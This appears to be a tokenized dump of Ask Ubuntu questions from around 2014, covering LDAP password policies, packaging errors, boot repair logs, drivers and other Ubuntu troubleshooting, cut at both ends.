olcmoduleload : { 1 } ppolicy cn=schema/cn= { 4 } ppolicy.ldif : dn : cn= { 4 } ppolicy cn=schema/cn= { 4 } ppolicy.ldif : cn : { 4 } ppolicy cn=schema.ldif : w policy state updates to be forwarded via updateref ' syntax omsboolean singl olcdatabase= { 1 } hdb/olcoverlay= { 0 } ppolicy.ldif : dn : olcoverlay= { 0 } ppolicy olcdatabase= { 1 } hdb/olcoverlay= { 0 } ppolicy.ldif : olcoverlay : { 0 } ppolicy olcdatabase= { 1 } hdb/olcoverlay= { 0 } ppolicy.ldif : olcppolicydefault : cn=default , ou=policies , dc=mydomain , dc=local here is the policy : dn : ou=policies , dc=mydomain , dc=local objectclass : organizationalunit objectclass : top ou : policies structuralobjectclass : organizationalunit entryuuid : 02bd96f4-b6ac-1033-8430-5db15c0b2efc creatorsname : cn=admin , dc=mydomain , dc=local createtimestamp : 20140812203558z entrycsn : 20140812203558.385280z # 000000 # 000 # 000000 modifiersname : cn=admin , dc=mydomain , dc=local modifytimestamp : 20140812203558z dn : cn=default , ou=policies , dc=mydomain , dc=local objectclass : pwdpolicy objectclass : device objectclass : top pwdattribute : userpassword pwdmaxage : 3024000 pwdexpirewarning : 1814400 pwdinhistory : 3 pwdmaxfailure : 3 pwdlockout : true pwdlockoutduration : 600 pwdgraceauthnlimit : 0 pwdfailurecountinterval : 0 pwdmustchange : true pwdallowuserchange : true structuralobjectclass : device entryuuid : 29977c86-b74c-1033-8432-5db15c0b2efc creatorsname : cn=admin , dc=mydomain , dc=local createtimestamp : 20140813154223z pwdminlength : 10 cn : default pwdcheckquality : 2 pwdsafemodify : true entrycsn : 20140822193458.399642z # 000000 # 000 # 000000 modifiersname : cn=admin , dc=mydomain , dc=local modifytimestamp : 20140822193458z i have been around and around on this . any help would be appreciated
514837	dpkg-shlibdeps : error : no dependency information found for /usr/local/lib/libwebsockets.so.4.0.0	i 'm packaging my c++ application using dpkg-buildpackage -rfakeroot -b i 've installed libwebsockets from the source rather than the debian package libwebsockets3 or libwebsocktes-dev . in the debian/control file i 've given libwebsocktes3 as the build-depends . how can i avoid this error ?
514839	reset windows share password after 'remember forever '	i 've been happily connecting to a windows share from my 14.04 machine . when i first entered the password for the share i chose to have it remembered forever . yesterday i changed the password on the windows machine , today i ca n't access the share ... my searches for a solution have been in vain , most suggestions say that there is an entry in the password & keys ( seahorse ) app that should be deleted , this does n't exist for me . i even ran seahorse as the root user to see if the key was hidden away in there , but no luck . is there anywhere else i should be looking ? should n't the nautilus app be prompting me to update my password in this scenario ?
514840	dv6000 screen freezing after usb boot when upgrading to trusty 14.04 lts	i love ubuntu but ca n't seem to get around this initial issue . i want to use it already haha but i 'm a noob can u guys help ? spex hp pavilion entertainment pc-widescreen dv6000 nvida grafix
514841	is the switching workscreen still available on v14.04 ?	on the older versions i was able to switch from one of 4 screens in the work space . is this not available in the new 14.04 version ?
514847	lost kde desktop effect after installing nvidia drivers	i have lost all desktop effects after installing the new driver of my graphic card . when i try to start it manually , i got an error and the details i got is : for technical reasons it is not possible to determine all possible error causes . desktop effect system is not running maybe it has something to do with the fact that i also installed cuda . does someone knows how i can fix this ?
514848	usb drive filesystem ?	so , school is approaching quickly , and one of the things on my supply list is a usb drive . now i 'm asking myself what filesystem to use . after some research , i found ext4 to be the most stable drive filesystem . but , i also found that windows ( the os used by every computer in my school ) ca n't read ext4 formatted drives without special drivers , and i 'm sure the school would n't be too happy with me having to install the windows ext4 drivers on every computer i use with my usb . so , my question is , should i use fat32 , one of the ext filesystems ( 2 , 3 or 4 would work ) or ntfs , i have an ubuntu laptop , a mac desktop , and of course the school computers i use are windows , so which would be the best filesystem for my usb .
514849	14.04 upgrade invitation problems	can anyone make something out of this ? after getting the invitation for upgrading from 12.04 to 14.04 , i click on the 'yes , upgrade now ' button and i get a little window saying 'authentication failed ' , authenticating the upgrade failed . there may be a problem with the network or with the server . it 's weird since i have a good solid connection while doing this . thanks and any help would be great . thanks again !
514852	how to solve package issues/dependencies	background info i am trying to install veins simulation environment by following the tutorial provided by the author . in step 1 it is required to install some packages in linux , the tutorial suggest this commands to be executed on terminal : sudo apt-get install build-essential gcc g++ bison flex perl tcl-dev tk-dev blt libxml2-dev zlib1g-dev default-jre doxygen graphviz libwebkitgtk-1.0-0 openmpi-bin libopenmpi-dev libpcap-dev autoconf automake libtool libxerces-c2-dev proj libgdal1-dev libfox-1.6-dev when i execute this command , i immediately get : e : package 'proj ' has no installation candidate then i remove the proj from the command and execute it again without proj in it , next i get : the following packages have unmet dependencies : libgdal1-dev : depends : libgdal-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . so , i remove libgdal1-dev from the command as well . and it executes file , by downloading the remaining packages . to troubleshoot the problem with proj and libdgal1-dev i go to the synaptic package manager . libgdal1-dev i search for libgdal1-dev in synaptic package manager and i get an entry . i mark for installation and then synaptic package manager suggests removing libxerces-c2-dev which is actually added via the initial command . should i trust synaptic package manager with this suggestion , and proceed further ? proj what should i do about proj . there are some packages in synaptic package manager such as proj-bin or libproj-dev . should i install them ? i think proj has to do with this and this what should i do to make sure that this simulation tool works fine ?
514853	tor browser install ubuntu 14.04	i have read the answers to other questions regarding the install/running of the tor browser . i have tried the answers given but still can not get the tor browser to run on mine . i have ubuntu 14.04 and where it shows to start tor browser when i double click all i get is an open tab full of code . anyone with suggestions i should try ? i also tried downloading from tor project did not work and tried the install using command in the terminal and it also did not work . when i had windows i had no problem with the install or the tor browser running . i really like ubuntu better this is the only thing that i am having trouble with . please help ! ! !
514854	still ca n't mount windows 8 drive after restart	after following the instructions in other posts , i am still getting the same error when i try to mount my windows 8 drive in ubuntu 14.04 on a dual boot system . i have disabled fast start after shutdown , hybrid hibernation , and the preinstalled asus instant on service . i have tried restarting windows rather than shutting down . in all cases i get the same error message , namely : error mounting /dev/sda4 at /media/jesse/os : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda4 '' `` /media/jesse/os '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda4 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i did not have the same issue before upgrading from ubuntu 12 to 14 . for what it 's worth my computer is supposedly a `` hybrid '' with an ssd drive installed , although i ca n't see that the ssd drive is being used at all with my present settings . any thoughts ?
514857	how can i undo this key mapping ?	first of all sorry my punctuation will be bad . its hard to type when keys are not doing what you expect . eg it keeps scaring the **** out of me by taking a screen shot when i push the up arrow lolol so anyways , i broke a key on my keyboard and used xkeycaps to remap it to an unused key which worked . but then i realized it screwed up other keys ... i think this is the program i used http : //www.jwz.org/xkeycaps/man.html and then after doing the modifications i found out how to save them from the second answer in this question how to map my enter key to a different key down where it says this '' when you are happy with your current keymap and want to use it in future x-sessions , run the following command to save it : xmodmap -pke > ~/.xmodmap '' i doubt this is relevant but i just restarted with a live cd and the keys all worked there . well it 's kind of relevant because it verifies what i was thinking ... worst case scenario i can format and reinstall and the issue will go away .
514859	any alternative to wine	i 'm looking for an application to do the same sort of thing as wine : running windows applications on ubuntu . is there any alternative application instead of install/using wine ?
514863	window borders , menu bar missing over vnc	i 'm running ubuntu 14.04 with unity and gnome3 , however i do n't have a screen hooked up anymore . i have installed x11vnc and run it with `` -create '' so that it will create a new x11 session , however when i vnc to it , the menu bar , window borders , etc are missing , windows are ordered based on creation time , and can not be resized . now , i do n't really care if i end up with ubuntu or gnome 's window manager , as long as this does n't mess up my normal desktop stuff if i should happen to hook a monitor up again , and i 'm not even attached to x11vnc if someone can point me to a good complete tutorial using something else , but i 've been trying vino and tightvnc and rdp and x11vnc is the only one i 've managed to get this far .
514864	ubuntu boot repair dell m1530	i 'm new to ubuntu and recently tried installing it on a dell m1530 . i had win7 x64 installed on the hdd , and would like to have dual boot option . i had trouble installing the first time and after ran the boot-repair . after running through the process , it was unable to complete . i do have a url http : //paste.ubuntu.com/7942911 . can someone help me fix this issue or direct me where to post or email ? thanks in advance .
514867	how to boot chromebook from sd card without entering developer mode ?	i have a question . is it at all possible to install ubuntu or chrubuntu onto a sd card and then boot a chromebook from said sd card ? i know this is easily possible , but the chromebook in question belongs to my school , so i can not enter developer mode , because that would void the license agreement . i do n't really care how technical or how many steps this will take , as long as it can be possible . thanks in advance .
514868	run a virtualbox vm in a second x-server with graphic support	i 'm starting a virtualbox vm ( windows 7 ) in a second x-server ( ubuntu 14.04 ) and i 'm using the following xinit script ( /path/.vboximage ) : optirun vboxmanage startvm < vm name > & exec tinywm i recognized that while running virtualbox normally under gnome ( unity to be precise ; - ) ) i get full graphics support . but when i run it on a second xserver there seem to be some problems . e.g . windows aero does n't seem to work and chrome webgl demos are running with poorer performance . i 'm not a big windows expert , so i do n't know how i could check the used graphic card ( specification ) . but it is very obvious that something has changed when running the vm in the extra x-server . also when i try to replace tinywm with compiz i get the unity frame around the vm , which also seems to have no graphics acceleration ( no transparency effects ) so it seems that the x-server does n't have graphic acceleration at all . i have a nvidia 525m and an intel hd3000 which are both capable of advanced graphics . i 'm starting the above script with startx /path/.vboximage - :1 how could i fix that ?
514869	using ubuntu command line to replace text in huge file	i have a huge xml file that i must work with . right now the file is only 1 line that contains about 2 million characters which represent 30,000 records . there are no carriage returns or linefeeds whatsoever . what i need to do is make each record on it 's own line . new records begin with < row > and end with < /row > . i 've been looking around here and it seems the tools to use are : sed , tr or awk but i 'm not sure which is most appropriate . i 've tried this to no avail : tr ' < row ' '\012 < row ' < source.xml |tee destination.xml above seems to output some pretty weird stuff so i must be way off here . maybe it 's that `` < `` character that is the problem ?
514873	multiple independent btrfs volumes	i have 4 x 2 tb drives . i want to set up one pair as a btrfs raid 1 volume , which i have done . i want to set up the second pair as a raid 0 data , raid 1 metadata volume , which i have not been able to do . it appears that the second pair get added to the first raid set , instead of being a separate volume . how do i accomplish this ? initially i tried this : for the first two drives- sudo mkfs.btrfs -d raid1 /dev/sdb /dev/sdc the for second pair- sudo mkfs.btrfs -l non-mirror /dev/sdd /dev/sde i forgot to specify a label for the raid1 set so the system assigned it one - the uuid
514875	curl : how to display chunk sizes and trailer headers ?	i am trying to use curl to send a get which responds with chunked data , and display the chunks , their sizes and any trailer headers . i tried curl -- raw ... but it did not do what i needed . is there an option that does that ?
514876	asus n550l external surround woofer not working	i need some help , i just ca n't make work external surround woofer with 14.04 . this is my hardware : raul @ bromo : ~ $ lspci | grep audio 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) i do n't understand why i see two devices , but i tried this : no sound from external subwoofer `` sonic master '' on an asus n76vm wich did not work . still woofer is mute . regards ,
514881	made huge mistake when updating , nothing seems to work	i recently tried to update my old song laptop to 12.4 to make it more useable , but i accidentally closed the computer without thinking while it was installing packages . now i 've turned it back on and all i get is a black screen with a line of settings - file , edit , view , go , bookmarks , help . i ca n't connect to the internet , the only thing i can do is change the background colour from black to blue or purple . i 'm not very tech savvy so please use fairly simple language . is there anything i can do ?
514884	last.fm scrobbling on ubuntu touch	does the default music app on ubuntu touch support ( realtime ) last.fm scrobbling ?
514886	notify-send does not work with root on ubuntu 14.04	i have a small python script that i start it using a shell script stored in '' /etc/x11/xsession.d '' the code is very simple it show a notification message import os import time while true : os.system ( 'notify-send -i `` /opt/say/logo.png '' `` title '' `` message '' ' ) time.sleep ( 30 ) the code simply shows a notification message every 30 seconds . it works on ubuntu 12.04 with no problem , but it does not work on ubuntu 14.04 . the shell script in `` /etc/x11/xsession.d '' run as a root and as result my python code run with root privileges . i do not really want root privileges . all i want is to be able to see the notification .
514887	how to configure qt to access standard icon resources/themes ?	i am developing an app using qt designer and struggling with mechanizing the icon resource themes . essentially , i 'd like to access all of the standard icons when i click choose resource . where on earth is the standard icon resource . thanks
514889	what is the default vnc server included ?	by default , there is an application installed in ubuntu that allows for remote desktop connections over vnc . the application shows up with the name desktop sharing in the unity dock . what is the actual name of this default vnc application , assuming you wanted to start the graphical application from the terminal .
514890	install command of terminal does n't work	i 'm a new user of ubuntu ( linux ) . using it from last 3 hours . i get problem when i try to apply any install command on terminal . check screenshot to check my issue ( due to low reputation i 'm not able to post image , check from here- http : //i.stack.imgur.com/d56xm.jpg ) . how can i fix issue ?
514891	gvm grails , intellj ca n't find sdk	i 'm using ubuntu 14.04 . now i installed grails via the gvm tool . i also tested it and created a demo app via the comandline and all works fine . but the big problem is , intellij ca n't find the grails lib . the home variables are set . i had groovy installed via apt so intellij could find it . but via the gvm not . what 's wrong there ?
514893	ubuntu not showing as boot option in bios	i 'm having loads of problems using ubuntu 14.04 64-bit in a machine with win8 preinstalled . i have tried installing it 3 different times , using different configurations . the one i 'm with now has a bios-grub partition . the problem is , there is no ubuntu option in the bios , as well as no grub . i have tried boot-repair plenty of times too with no success . my computer is an asus k46cb , there is no secure boot option in the bios to turn off , and i believe ( due to error messages that have popped up ) that my computer is currently on legacy mode . there is also no indication of this in the bios . any ideas ? at this point i dont even care about grub , i just want to be able to boot ubuntu .
514895	how to fix : usb mouse settings restored to default on each connection ?	i 'm connecting and disconnecting usb mouse from the notebook . i 've noticed that every time default xinput settings is restored , precisely device accel velocity scaling ( 271 ) : 10.000000 which drives me mad - mouse is way too fast . i 've found out that : xinput told me what device_id has my mouse , xinput list-props [ device_id ] contained source of my problem , and xinput set-prop [ device_id ] [ prop_id ] [ value ] changed the mouse speed to acceptable experience . how to run that last command on each usb mouse connection or even better - make the setting permanent ? for now i 'm using following command : xinput set-prop 'pointer : mosart semi . 2.4g keyboard mouse ' 'device accel velocity scaling ' 4 i have to use string mouse id ( words ) instead of numeric because on every disconnection that can change , same for prop id . also pointer : prefix because the mouse apparently shows its ' special keys as a keyboard and could not be identified by string otherwise .
514898	recovering my ubuntu 14.04 computer	i have an old dell dual core laptop that has only ubuntu 14.04 os installed . my kids was playing around with it couple days ago and for some reason , the laptop not booting . when i turned on the laptop , it showed me the grub command . then i tried to fix it with boot repair disk , now when i turn on the laptop , it says : '' windows could not start because the following file is missing or corrupt : \windows\system32\config\system ... '' sorry for the long text but below is the generated boot info txt from boot repair disk . please help . boot info script e7fc706 + boot-repair extra info [ boot-info 31jan2013 ] ============================= boot info summary : =============================== = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sda . sda1 : __________________________________________________________________________ file system : vfat boot sector type : windows xp : fat32 boot sector info : no errors found in the boot parameter block . operating system : windows xp boot files : /boot.ini /windows/system32/drivers/ /q^|_'t`9.efi /bootmgr /ntldr /ntdetect.com sda2 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 145,806,003 149,998,904 4,192,902 c w95 fat32 ( lba ) /dev/sda2 149,508,094 156,301,311 6,793,218 5 extended /dev/sda5 149,508,096 156,301,311 6,793,216 82 linux swap / solaris /dev/sda1 overlaps with /dev/sda2 /dev/sda1 overlaps with /dev/sda5 '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 07d7-051e vfat mediadirect /dev/sda5 94686d8c-7690-44f7-ad72-428578388f56 swap /dev/sr0 iso9660 boot-repair-disk 32bit ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) ================================ sda1/boot.ini : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- _iack_sc ( 0 ) /* hack ! */ /* * the canonical non-remaped i/o and mem addresses have these values * subtracted out . this is arranged so that folks manipulating isa * devices can use their familiar numbers and have them -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== stderr messages : =============================== file descriptor 8 ( /proc/6838/mounts ) leaked on lvscan invocation . parent pid 12460 : bash no volume groups found additional information : =================== log of boot-repair 2014-08-22__07h58 =================== boot-repair version : 3.198~ppa16~raring boot-sav version : 3.198~ppa16~raring glade2script version : 3.2.2~ppa45~raring boot-sav-extra version : 3.198~ppa16~raring file descriptor 8 ( /proc/6838/mounts ) leaked on lvs invocation . parent pid 8218 : /bin/sh no volume groups found boot-repair is executed in live-session ( boot-repair-disk 32bit 24avr2013 , raring , ubuntu , i686 ) ls : can not access /home/usr/.config : no such file or directory cpu op-mode ( s ) : 32-bit file=/cdrom/preseed/lubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash -- =================== os-prober : /dev/sda1 : windows nt/2000/xp ( loader ) : windows : chain =================== blkid : /dev/loop0 : type= '' squashfs '' /dev/sda1 : label= '' mediadirect '' uuid= '' 07d7-051e '' type= '' vfat '' /dev/sda5 : uuid= '' 94686d8c-7690-44f7-ad72-428578388f56 '' type= '' swap '' /dev/sr0 : label= '' boot-repair-disk 32bit '' type= '' iso9660 '' 1 disks with os , 1 os : 0 linux , 0 macos , 1 windows , 0 unknown type os . warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . =================== uefi/legacy mode : this live-session is not efi-compatible . secureboot maybe enabled . =================== partitions & disks : sda1 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , is-correct-efi , part-has-no-fstab , part-has-no-fstab , ntldr , no-winload , no-recov-nor-hid , bootmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda1 . sda : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , has-os , 2048 sectors * 512 bytes =================== parted -l : error : ca n't have overlapping partitions . warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label =================== parted -lm : error : ca n't have overlapping partitions . warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/lubuntu/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=lubuntu ) /dev/sda1 on /mnt/boot-sav/sda1 type vfat ( rw ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 sda5 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : agpgart alarm ashmem autofs binder block bsg btrfs-control bus cdrom cdrw char console core cpu cpu_dma_latency disk dri dvd ecryptfs fb0 fd full fuse fw0 hpet input kmsg log mapper mcelog mem net network_latency network_throughput null oldmem port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda5 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout uinput urandom vga_arbiter vhost-net zero ls /dev/mapper : control =================== hexdump -n512 -c /dev/sda1 00000000 eb 58 90 4d 53 44 4f 53 35 2e 30 00 02 08 20 00 |.x.msdos5.0 ... .| 00000010 02 00 00 00 00 f8 00 00 3f 00 ff 00 b3 d2 b0 08 | ... ... .. ? ... ... .| 00000020 86 fa 3f 00 fd 0f 00 00 00 00 00 00 02 00 00 00 |.. ? ... ... ... ... .| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 80 00 29 1e 05 d7 07 44 65 6c 6c 4d 44 33 70 6c |.. ) ... .dellmd3pl| 00000050 61 79 46 41 54 33 32 20 20 20 33 c9 8e d1 bc f4 |ayfat32 3 ... ..| 00000060 7b 8e c1 8e d9 bd 00 7c 88 4e 02 8a 56 40 b4 08 | { ... ... |.n..v @ ..| 00000070 cd 13 73 05 b9 ff ff 8a f1 66 0f b6 c6 40 66 0f |..s ... ... f ... @ f.| 00000080 b6 d1 80 e2 3f f7 e2 86 cd c0 ed 06 41 66 0f b7 | ... . ? ... ... .af..| 00000090 c9 66 f7 e1 66 89 46 f8 83 7e 16 00 75 38 83 7e |.f..f.f..~..u8.~| 000000a0 2a 00 77 32 66 8b 46 1c 66 83 c0 0c bb 00 80 b9 |*.w2f.f.f ... ... .| 000000b0 01 00 e8 2b 00 e9 48 03 a0 fa 7d b4 7d 8b f0 ac | ... +..h ... } . } ... | 000000c0 84 c0 74 17 3c ff 74 09 b4 0e bb 07 00 cd 10 eb |..t. < .t ... ... ... | 000000d0 ee a0 fb 7d eb e5 a0 f9 7d eb e0 98 cd 16 cd 19 | ... } ... . } ... ... .| 000000e0 66 60 66 3b 46 f8 0f 82 4a 00 66 6a 00 66 50 06 |f`f ; f ... j.fj.fp.| 000000f0 53 66 68 10 00 01 00 80 7e 02 00 0f 85 20 00 b4 |sfh ... ..~ ... . ..| 00000100 41 bb aa 55 8a 56 40 cd 13 0f 82 1c 00 81 fb 55 |a..u.v @ ... ... ..u| 00000110 aa 0f 85 14 00 f6 c1 01 0f 84 0d 00 fe 46 02 b4 | ... ... ... ... .f..| 00000120 42 8a 56 40 8b f4 cd 13 b0 f9 66 58 66 58 66 58 |b.v @ ... ... fxfxfx| 00000130 66 58 eb 2a 66 33 d2 66 0f b7 4e 18 66 f7 f1 fe |fx . *f3.f..n.f ... | 00000140 c2 8a ca 66 8b d0 66 c1 ea 10 f7 76 1a 86 d6 8a | ... f..f ... .v ... .| 00000150 56 40 8a e8 c0 e4 06 0a cc b8 01 02 cd 13 66 61 |v @ ... ... ... ... fa| 00000160 0f 82 54 ff 81 c3 00 02 66 40 49 0f 85 71 ff c3 |..t ... ..f @ i..q..| 00000170 4e 54 4c 44 52 20 20 20 20 20 20 00 00 00 00 00 |ntldr ... ..| 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 4e 54 | ... ... ... ... ..nt| 000001b0 4c 44 52 20 69 73 20 6d 69 73 73 69 6e 67 ff 0d |ldr is missing..| 000001c0 0a 44 69 73 6b 20 65 72 72 6f 72 ff 0d 0a 50 72 |.disk error ... pr| 000001d0 65 73 73 20 61 6e 79 20 6b 65 79 20 74 6f 20 72 |ess any key to r| 000001e0 65 73 74 61 72 74 0d 0a 00 00 00 00 00 00 00 00 |estart ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 00 ac bf cc 00 00 55 aa | ... ... ... ... ..u.| 00000200 =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 1.6g 21m 1.6g 2 % / udev devtmpfs 1.6g 12k 1.6g 1 % /dev tmpfs tmpfs 328m 752k 327m 1 % /run /dev/sr0 iso9660 496m 496m 0 100 % /cdrom /dev/loop0 squashfs 431m 431m 0 100 % /rofs none tmpfs 4.0k 0 4.0k 0 % /sys/fs/cgroup tmpfs tmpfs 1.6g 8.0k 1.6g 1 % /tmp none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 1.6g 0 1.6g 0 % /run/shm none tmpfs 100m 12k 100m 1 % /run/user /dev/sda1 vfat 2.0g 1.3g 722m 65 % /mnt/boot-sav/sda1 =================== fdisk -l : disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000909a4 device boot start end blocks id system /dev/sda1 * 145806003 149998904 2096451 c w95 fat32 ( lba ) /dev/sda2 149508094 156301311 3396609 5 extended /dev/sda5 149508096 156301311 3396608 82 linux swap / solaris =================== recommended repair recommended-repair this setting will restore the [ ( generic mbr ) ] mbr in sda , and make it boot on sda1 . additional repair will be performed : unhide-bootmenu-10s fix-windows-boot quantity of real windows : 1 will restore the mbr_to_restore : sda ( generic mbr ) into sda dd if=/usr/lib/syslinux/mbr.bin of=/dev/sda 0+1 records in 0+1 records out boot successfully repaired . you can now reboot your computer .
514900	can not add ppa ; solutions not working	i am doing this command : sudo add-apt-repository ppa : webupd8team/java the error output is : can not add ppa : 'ppa : webupd8team/java ' . please check that the ppa name or format is correct . i have tried both the steps as suggested on this thread can not add ppa . please check that the ppa name or format is correct , but even then the error is not resolved . i am on ubuntu 14.04 inside vmware , connected to college vpn proxy network . what should be done ?
514902	flash plugin in ubuntu 14.04 lts	after upgrading to ubuntu 14.04 lts from ubuntu 13.10 32-bit , my firefox browser is asking to upgrade flash player 11.2 or greater . default firefox plugin installer utility is not being able to search any new version . downloading and installation from adobe.com is presenting some linux versions but i am confused which file should i download and install . apt for ubuntu 10.04+ is asking to choose an application to open the downloaded file . can anyone help me in upgrading my flash plugin ?
514904	ubuntu 14.04 nvidea gt 840m graphics	i am having trouble with my geforce gt 840m on my brand new ubuntu instillation , it does not seem to be listed as my graphics card . details page however the card is listed under lspci lspci i have tried installing drivers for it from the nvidia website but after going through the instillation process ( cntrl+alt+1 then , sudo service lightdm stop , then sudo sh nvidia-linux-x86_64-340.32.run ) my instillation no longer works . when logging into a user the top bar as well as the dock do not appear . i also seem to be unable to get drivers for it from the software & updates menu as it tells me that there are no updates available .
514906	images produced by inkscape display incorrectly in pdflatex document	i have some problems with images i created with inkscape ( processed by pdflatex ) . i produced a book which i 'm trying to publish by createspace . the images in the proof of the document produced by createspace appear to be altered in the print : some characters are moved around randomly , sometimes two characters have switched locations within the same image . this may have something to do with transparencies of some images which have been flattened during the pre-processing of the pdf file i submitted to createspace . is there a way to flatten transparency with inkscape or other software on linux ? thank you .
514907	dell inspiron 7377 sound problem	install of 14.04.1 was smooth , and everything runs beautifully ... except there 's no sound.at all.it shows that i 'm using the realtek alc283 drivers , and the card shows up in both alsa and pavucontrol , and pavucontrol shows that there 's sound being passed to it ... so why 's it silent ? i 've tried all the workarounds that i could find via a google search , but to no avail.headphone sound works ( i have no idea if hdmi sound works ... i do n't have a flatscreen i can test it on right now ) , but that 's it .
514908	make password appear censored in bash script	i am going to make this short and simple . i am making a bash script where the user needs to enter their root password using the read command and it will be stored in a variable . what i do n't like is that their password is clearly visible as they type it . i want their password to be shown as stars or be invisible like when normally entering root password . i do n't mind using tput . how can i do this ?
514909	apt-get update stalls	when i run sudo apt-get update the update fails to finish . this is the result in the console : get:1 http : //repository.spotify.com stable inrelease [ 2,980 b ] hit http : //download.virtualbox.org trusty inrelease hit http : //repo.steampowered.com precise inrelease ign http : //repository.spotify.com stable inrelease hit http : //downloads.hipchat.com stable inrelease hit http : //download.virtualbox.org trusty/contrib amd64 packages hit http : //downloads.hipchat.com stable/main amd64 packages ign http : //toolbelt.heroku.com ./ inrelease hit http : //download.virtualbox.org trusty/non-free amd64 packages ign http : //ppa.launchpad.net trusty inrelease ign http : //extras.ubuntu.com trusty inrelease hit http : //download.virtualbox.org trusty/contrib i386 packages get:2 http : //repos.codelite.org saucy inrelease [ 2,893 b ] hit http : //downloads.hipchat.com stable/main i386 packages ign http : //repos.codelite.org saucy inrelease hit http : //download.virtualbox.org trusty/non-free i386 packages hit http : //toolbelt.heroku.com ./ release.gpg hit http : //extras.ubuntu.com trusty release.gpg hit http : //ppa.launchpad.net trusty release.gpg ign http : //repository.spotify.com stable/non-free amd64 packages/diffindex hit http : //repo.steampowered.com precise/steam sources ign http : //repository.spotify.com stable/non-free i386 packages/diffindex ign http : //repos.codelite.org saucy/universe amd64 packages/diffindex hit http : //toolbelt.heroku.com ./ release hit http : //extras.ubuntu.com trusty release hit http : //ppa.launchpad.net trusty release ign http : //repos.codelite.org saucy/universe i386 packages/diffindex hit http : //extras.ubuntu.com trusty/main sources hit http : //ppa.launchpad.net trusty/main amd64 packages hit http : //repo.steampowered.com precise/steam amd64 packages hit http : //extras.ubuntu.com trusty/main amd64 packages hit http : //ppa.launchpad.net trusty/main i386 packages hit http : //extras.ubuntu.com trusty/main i386 packages hit http : //toolbelt.heroku.com ./ packages hit http : //repo.steampowered.com precise/steam i386 packages ign http : //download.virtualbox.org trusty/contrib translation-en_us ign http : //download.virtualbox.org trusty/contrib translation-en ign http : //downloads.hipchat.com stable/main translation-en_us ign http : //download.virtualbox.org trusty/non-free translation-en_us ign http : //download.virtualbox.org trusty/non-free translation-en ign http : //downloads.hipchat.com stable/main translation-en ign http : //toolbelt.heroku.com ./ 